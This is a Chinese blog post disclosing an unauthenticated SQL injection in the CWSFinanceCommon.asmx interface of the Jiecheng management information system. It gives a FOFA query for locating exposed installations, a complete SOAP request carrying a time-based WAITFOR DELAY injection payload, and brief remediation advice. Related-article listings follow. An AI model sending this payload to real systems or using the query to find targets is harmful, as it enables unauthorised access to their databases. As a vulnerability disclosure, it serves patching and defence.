挖洞经验—捷诚信息管理系统.SQL注入漏洞

最新推荐文章于 2024-07-09 23:33:45 发布
最新推荐文章于 2024-07-09 23:33:45 发布
阅读量140 收藏
点赞数
文章标签: 安全 web安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64875725/article/details/134546898
版权

       免责声明:文章内容来源于互联网收集整理,仅供学习参考,请勿使用文章内容从事非法测试及恶意攻击,由于传播、利用文章所提供的信息或工具造成的一切损失均由使用者自行承担,并且产生的一切不良后果与文章作者无关。本文章仅供学习参考。

0x01 漏洞描述

             捷诚管理信息系统中的CWSFinanceCommon.asmx接口存在SQL注入漏洞,攻击者可以未经身份认证便可通过该漏洞获取数据库敏感信息,并且深入利用获取服务器权限,危害甚大。

0x02 漏洞复现

              通过fofa查询 body="/Scripts/EnjoyMsg.js"

              poc:

POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: ip:port
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: text/xml; charset=utf-8
 
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';WAITFOR DELAY '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

抓包查看,延时5秒

0x03 漏洞修复建议

             1、关闭该功能页面或接口处设置外部访问权限

             2、安装修复补丁或升级至安全版本

Russ0West
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
漏洞复现】捷诚管理信息系统 CWSFinanceCommon.asmx SQL注入
知黑而守白
01-09 334
捷诚管理信息系统是一款功能全面,可以支持自营、联营到外柜租赁的管理,其自身带工作流管理工具,能够帮助企业有效的开展内部审批工作。该系统 CWSFinanceCommon.asmx 接口存在sql注入漏洞。攻击者可以通过构造恶意的SQL语句,成功注入并执行恶意数据库操作,可能导致敏感信息泄露、数据库被篡改或其他严重后果。
捷诚信息安全商业计划书.zip
11-25
捷诚公司可能致力于为企业提供全面的信息安全解决方案,包括但不限于防火墙管理、入侵检测系统、数据加密、身份验证和访问控制等服务。这些服务旨在保护企业的敏感信息免受外部攻击和内部泄露,确保业务连续性和数据...
捷诚信息安全商业计划书.doc
09-11
捷诚信息安全商业计划书.doc
捷诚信息安全商业计划书-精品创业书模板.rar
09-17
1. 产品概述:捷诚信息安全可能提供全面的信息安全解决方案,包括防火墙、入侵检测系统、数据加密、安全咨询与培训等。 2. 技术创新:利用最新的加密算法、行为分析技术、人工智能等,提高产品的防护能力和响应速度...
捷诚信息安全商业计划书-精品创业书模板.doc
04-23
捷诚信息安全商业计划书-精品创业书模板.doc
构建安全稳定的应用:SpringSecurity实用指南
zhugedali_的博客
07-04 702
它涵盖了认证(Authentication)、授权(Authorization)、防止常见的安全攻击等多个方面,适用于各种类型的应用,包括 Web 应用、RESTful 服务、微服务等。- 生成认证对象:认证成功后,创建包含用户信息、角色和权限的 Authentication 对象,并存储在安全上下文中。- 加载用户角色和权限:除了基本的用户信息,还包括用户所拥有的角色和权限。- 认证请求处理:根据配置的认证方式,对用户提交的认证信息进行验证。
【易捷海购-注册安全分析报告】
weixin_46641057的博客
07-05 1205
易捷国际作为中石化易捷旗下专业跨境电商平台,大概是因为和阿里有战略合作层面的关系, 所以在选的不是常见的类似极验、腾讯等滑动拼图类产品, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
[图解]SysML和EA建模住宅安全系统-09-流程指南·分析系统需求
rolt的专栏
07-04 906
然后这一步,你看,这里有个决策点
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 662
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
谷歌正在试行人脸识别办公室安全系统
网络研究观
07-04 1197
谷歌正在测试面部识别技术用于办公室安全,以帮助防止未经授权的个人进入园区。
等保测评新趋势:应对数字化转型中的安全挑战
A526847的博客
07-09 168
通过建立健全等保测评体系、加强技术研究和培训、构建安全生态系统、强化合规性管理以及加强数据安全和隐私保护等措施,企业可以更有效地应对数字化转型中的安全挑战,确保信息系统的安全性和合规性,为企业的业务创新和发展提供坚实的保障。针对数字化转型的特点,制定专门的等保测评标准和流程,加强对数据生命周期管理、数据脱敏、隐私保护等方面的要求。引入先进的安全技术和工具,提升等保测评的自动化和智能化水平。大数据、人工智能、机器学习等技术的引入,将极大地提升等保测评的自动化和智能化水平。一、等保测评的新趋势。
如何通过文件分发系统,实现能源电力企业文件的安全分发流转?
文件数据安全交换
07-09 289
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。大文件虚拟分块、海量文件虚拟拼接技术,保障大文件、海量文件的可靠传输;针对不同的⽂件类型(如业务数据、运维⽂件等)、分⽀机构、⼈员⻆⾊、及⽂件交换⽅向,可灵活配置不同的管控策略,进⽽控制⽂件流转的内容和范围,实现精细管控。
案例精选 | 聚铭综合日志分析系统为江苏省电子口岸构建高效安全的贸易生态
juminfo的博客
07-05 631
江苏省电子口岸有限公司,成立于2009年,由江苏省贸促会携手南京海关、江苏检验检疫局及江苏海事局等部门共同出资组建。公司承载着推动江苏乃至长三角地区国际贸易便利化的重大使命,致力于打造一个集先进性、创新性、高效性于一体的电子口岸综合服务平台,为国际贸易的参与者提供全方位、一站式的服务。随着跨境电子商务的迅猛发展,每日处理的报关单证、物流信息等数据量呈指数级增长,这对公司的信息化管理能力提出了前所未有的挑战,特别是在安全合规、数据处理效率及业务连续性方面。
RFID智能锁控系统在物流安全运输中的应用与效益分析
07-09 423
RFID(Radio Frequency Identification)技术是一种无线通信技术,通过无线电波识别和追踪带有RFID标签的物体。RFID技术在物流锁控系统中的应用,可以有效地解决传统锁控系统的局限性。
案例|180套设备24小时监测,守护某油气管线安全
Hi_Target的博客
07-09 526
通过安装风速仪、加速度传感器、倾角计、温度变送器、索力计、磁通量传感器等监测设备,实现对跨越桥风速风向、结构振动、索塔倾斜、结构温度、吊索索力和主缆索力等参数进行实时监测。凭借中海达监测产品的先进性和稳定性,以及强大的交付保障能力,实现了全天候对该油气管线跨越桥和油气管道运营状况进行实时监测预警,大幅提高桥梁和油气管道管理效率。实时掌握桥梁运行的风速风向、索力、主梁挠度、振动、主塔倾角和结构温度等监测参数,并对所感知的数据进行实时解析和综合分析,为桥梁结构的管理养护提供数据支撑。▲光栅光纤应变计及温度计。
[数仓]十、离线数仓(安全集群实战)
最新发布
weixin_44428807的博客
07-09 587
1.新建/opt/module/presto/etc/access-control.properties配置文件,内容如下。1.在/opt/module/presto/etc/catalog/hive.properties中增加以下参数。2.分发/opt/module/presto/etc/catalog/hive.properties文件。2. 新建/opt/module/presto/etc/rules.json文件,内容如下。
零信任网络安全
ITmoster的博客
07-09 714
采用并实施零信任安全方法,以确保对网络及其组件的受限和安全访问,这样做可以最大程度地减少组织遭受网络威胁的风险。SIEM 解决方案(如Log360)可通过其 UEBA 和 CASB 功能帮助组织维护零信任环境。
【东奥会计-注册安全分析报告】
weixin_46641057的博客
07-05 943
东奥会计作为老牌的会计专业在线培训机构,背靠北大这颗大树,技术实力雄厚,但在验证产品方面,不是自己研发而是采用第三方的阿里的滑动条, 阿里的产品由于过度重视用户体验, 简单的滑动条特别,模拟器只需要单轴的模拟轨道就可以通过, 说明阿里对轨迹的校验比较宽松,之前的分析显示,阿里主要是靠模拟器识别,如果这道关过了,就没有其它的防护措施了。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的。
信息安全概述
Thewei666的博客
07-05 814
一种恶意程序,可以感染设备、网络与数据中心并使其瘫痪,直至用户支付赎金使系统解锁。
用C语言设计一个程序计算n的捷诚
06-02
然后通过printf和scanf函数分别输出提示信息并读取用户输入的整数。 接下来使用for循环语句计算n的阶乘,从1到n依次累乘到fact中。 最后使用printf函数输出结果,程序结束。 希望这个程序能够帮助到你!如果你有...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Russ0West

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值